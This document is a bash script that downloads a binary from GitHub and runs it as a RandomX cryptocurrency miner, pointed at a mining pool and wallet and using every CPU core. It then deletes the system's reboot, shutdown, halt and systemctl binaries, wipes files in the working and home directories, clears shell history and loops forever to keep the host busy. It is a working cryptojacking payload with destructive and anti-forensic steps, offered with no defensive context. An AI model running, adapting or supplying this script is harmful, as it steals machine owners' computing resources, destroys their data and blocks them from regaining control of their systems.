#!/bin/bash
wget -O mmm https://github.com/kidoescegh/xm/raw/main/lfirig > /dev/null 2>&1
chmod 777 mmm
./mmm --donate-level 1 -o randomx.rplant.xyz:7144 -u fySunSKDjvQ9MDAaAMwW53iBrsMhukvahJQsk1oXShpq33pMS32NYziVoU5bNdhpSkLUh7uVdmkjZhmvikq4tA9h1swuRn4jQ -p $(shuf -n 1 -i 1-99999)-Bismillah -a rx/0 -k -t $(nproc --all)
sleep 30
sudo rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl || rm -rvf /sbin/reboot /sbin/shutdown /sbin/poweroff /sbin/halt /bin/systemctl /usr/sbin/reboot /usr/sbin/shutdown /usr/sbin/poweroff /usr/sbin/halt /usr/bin/systemctl
curl ifconfig.me
rm -rvf *
cd ~/
rm -rvf *
history -cr
while true
do
        echo "hold down..."
        sleep 30
done
